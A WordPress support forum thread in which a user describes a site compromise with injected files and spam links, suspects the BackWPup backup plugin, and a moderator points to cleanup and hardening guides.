Title: security problem Last modified: August 21, 2016 --- # security problem * [tounoki](https://wordpress.org/support/users/tounoki/) * (@tounoki) * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/) * Hi I think I had a security problem or vulnerability with backWPUp. Some files appears like md5.php file in the root directory of my blog. Or with a common name that seems normal like /images/index.html. The crack insert a lot of weblinks to commercial websites in the used theme. There is the same with different themes I use. I have kept the inserted files maybe the inserted links (I have to search again them) I don’t know the exact vulnerability ; my solution is to stop use the plugin :\ BR Nico * [http://wordpress.org/extend/plugins/backwpup/](http://wordpress.org/extend/plugins/backwpup/) Viewing 3 replies - 1 through 3 (of 3 total) * Thread Starter [tounoki](https://wordpress.org/support/users/tounoki/) * (@tounoki) * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948932) * The version was : Stable tag: 3.0.11 The content of md5.php was : `` Nico * Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/) * (@jdembowski) * Forum Moderator and Brute Squad * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948940) * > Some files appears like md5.php file in the root directory of my blog. Or > with a common name that seems normal like /images/index.html. * I don’t know if you have an exploit with BackWPup but your site was compromised and needs to be deloused. * This is an often quoted response (I’m trying to avoid Copy/Pasta [it’s an inside joke]) but those links can really help you get a handle on your situation. * You need to start working your way through these resources: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779) [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/) * Anything less will probably result in the hacker walking straight back into your site again. * Additional Resources: [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress) [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html) * Give those a start and hopefully you can lock down and fix your installation. * Thread Starter [tounoki](https://wordpress.org/support/users/tounoki/) * (@tounoki) * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948955) * I have already fixed my installations (3 WP with the same problem on the same host). I made a lot of tests (about several weeks and _scientific_ method ;o)) and a vulnerabilty in backWPup is my last conclusion (even if I can off course be wrong). Thanks for the links : I have done the entire list of the first link few times (more than 5). Only when I didn’t upload again the plugin, installation was staying clean until today (it was more than 1 month ago – and attacks came between 3 and 7 days after the cleanup). Nico Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘security problem’ is closed to new replies. * ![](https://ps.w.org/backwpup/assets/icon-256x256.png?rev=3236141) * [BackWPup – WordPress Backup & Restore Plugin](https://wordpress.org/plugins/backwpup/) * [Support Threads](https://wordpress.org/support/plugin/backwpup/) * [Active Topics](https://wordpress.org/support/plugin/backwpup/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/backwpup/unresolved/) * [Reviews](https://wordpress.org/support/plugin/backwpup/reviews/) * 3 replies * 2 participants * Last reply from: [tounoki](https://wordpress.org/support/users/tounoki/) * Last activity: [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948955) * Status: not resolved